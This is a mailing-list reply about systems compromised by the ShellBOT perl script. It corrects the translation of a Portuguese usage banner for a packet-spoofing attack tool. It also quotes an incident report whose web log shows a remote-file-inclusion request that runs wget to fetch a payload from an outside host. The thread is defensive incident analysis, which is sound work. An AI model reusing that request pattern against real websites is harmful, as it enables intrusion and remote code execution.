Re: Systems compromised with ShellBOT perl script - part 2

I think I can help a bit with the portuguese here (my "translation is 
between []):

* * doze4 - written by phyton
* * doze4 rOckz! evite hosts.. use ips!
Usage: %s <ip> <porta> <spoof>
<ip>     : endereço que deseja f***r. [address that you want to f***r]
<porta>  : porta aperta  (coloque 0, que é rOckz) [open "door" [port] 
(Put/use
0, that rOckz))
<spoof>  : um ip para ser spoofado (sua mascara). (an IP to be spoofed
(a/the mask))


I make this little subtle corrections only because the little subtle 
differences with the one original posted translation could be of use or 
matter for somebody.

Aníbal


Kirby Angell wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> (note:  This is a follow up to "Systems compromised with ShellBOT perl
> script" posted on 20040901)
>
> Introduction
> - ------------
>
> Two days ago we detected a strange Referer entry in our web logs.  This
> morning we got almost the same Referer again:
>
> http://www.DOMAIN.com/index.php?id=http://members.lycos.co.uk/gookboy/hkz.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/gookboy/.egg2 
>
>
> <snip a long good report>


> - --
> Thank you,
>
> Kirby Angell
> Get notified anytime your website goes down!
> http://www.alertra.com
> key: 9004F4C0
> fingerprint: DD7E E88D 7F50 2A1E 229D  836A DB5B A751 9004 F4C0
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.4 (GNU/Linux)
> Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
>
> iD8DBQFBOQBQ21unUZAE9MARApnkAKCUicL19u64sXZUw4CHkybDmEJ1HQCeKKRj
> l/dzGuRlVQ7TneVqdErV+7c=
> =WY/A
> -----END PGP SIGNATURE-----